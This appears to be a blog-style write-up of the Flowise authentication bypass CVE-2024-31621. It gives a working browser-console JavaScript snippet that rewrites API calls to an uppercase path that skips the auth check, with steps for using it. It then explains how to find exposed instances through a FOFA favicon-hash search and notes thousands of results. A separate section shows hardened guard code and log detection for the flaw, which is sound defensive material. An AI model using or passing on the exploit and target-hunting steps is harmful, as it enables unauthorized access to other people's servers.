CVE-2024-31621
Flowise <= 1.6.5 authentication bypass
Flowise is an open source low-code tool for developers to build customized LLM orchestration flows and AI agents.
Basically, the server doesn't apply its authentication check to requests made to the uppercase endpoint /API/V1.
We just have to rewrite every AJAX request endpoint to its uppercase version, and we can do this client side.
Here's the JavaScript code, taken from my gist:
// Keep a reference to the original open(), then wrap it so every
// request the UI makes to /api/v1/ is sent to /API/V1/ instead.
var req = XMLHttpRequest.prototype.open;
XMLHttpRequest.prototype.open = function(method, url) {
    // Rewrite the URL argument before handing the call to the original open()
    arguments[1] = url.replace('/api/v1/', '/API/V1/');
    return req.apply(this, arguments);
};
To use this, navigate to a page that does not require authentication (ex: /tools),
then paste this code into the dev tools console.
Congratulations! This will last until you manually reload the page.
[*] flowise_authbypass.png
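To make the defect concrete from the defending side, here is an added example (not Flowise's code and not from the gist above): a hypothetical auth guard whose prefix test is case-sensitive, the same guard with the path case-folded before the test, and a small filter that flags access-log lines using a case-variant spelling of the API prefix. It assumes the router itself is case-insensitive (the Express default), which is why the guard must be too; the log lines are constructed.

```javascript
// Added example, not Flowise's own middleware: the API prefix the auth guard protects.
const API_PREFIX = '/api/v1/';

// Vulnerable shape: a case-sensitive prefix test. A request to /API/V1/... is
// never treated as an API call here, so the credential check is skipped while a
// case-insensitive router still dispatches it to the real handler.
function requiresAuthVulnerable(path) {
  return path.startsWith(API_PREFIX);
}

// Hardened shape: fold the path to lower case before the prefix test, so every
// spelling of the API route is subject to the same credential check.
function requiresAuthHardened(path) {
  return path.toLowerCase().startsWith(API_PREFIX);
}

// Detection: return the request paths from access-log lines that match the
// API prefix only after case folding, i.e. an unusual spelling of /api/v1/.
function findCaseVariantRequests(logLines) {
  const flagged = [];
  for (const line of logLines) {
    const m = line.match(/"(?:GET|POST|PUT|DELETE|PATCH) (\S+)/);
    if (!m) continue;
    const path = m[1];
    if (!path.startsWith(API_PREFIX) && path.toLowerCase().startsWith(API_PREFIX)) {
      flagged.push(path);
    }
  }
  return flagged;
}

// Constructed sample access-log lines (not real traffic).
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/May/2024:10:00:01 +0000] "GET /api/v1/chatflows HTTP/1.1" 401 -',
  '10.0.0.5 - - [01/May/2024:10:00:02 +0000] "GET /API/V1/chatflows HTTP/1.1" 200 1234',
  '10.0.0.7 - - [01/May/2024:10:00:03 +0000] "GET /tools HTTP/1.1" 200 5678',
];

console.log('vulnerable guard on /API/V1/:', requiresAuthVulnerable('/API/V1/chatflows'));
console.log('hardened guard on /API/V1/:', requiresAuthHardened('/API/V1/chatflows'));
console.log('flagged paths:', findCaseVariantRequests(SAMPLE_LOG));
```

A 200 on a case-variant API path from an unauthenticated client is the signal worth alerting on; the same paths served a 401 in their lowercase spelling.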
Looking for vulnerable targets
Its favicon hash is -2051052918; knowing this, we just have to search for it on FOFA,
which gives us more than 6k results.
[*] fofa_results.png
By the way, most of these results don't even have a login, bruh. This is because AI has been a hot topic these last few years,
so inexperienced people and companies will find a way to use an LLM for anything, appropriate or not.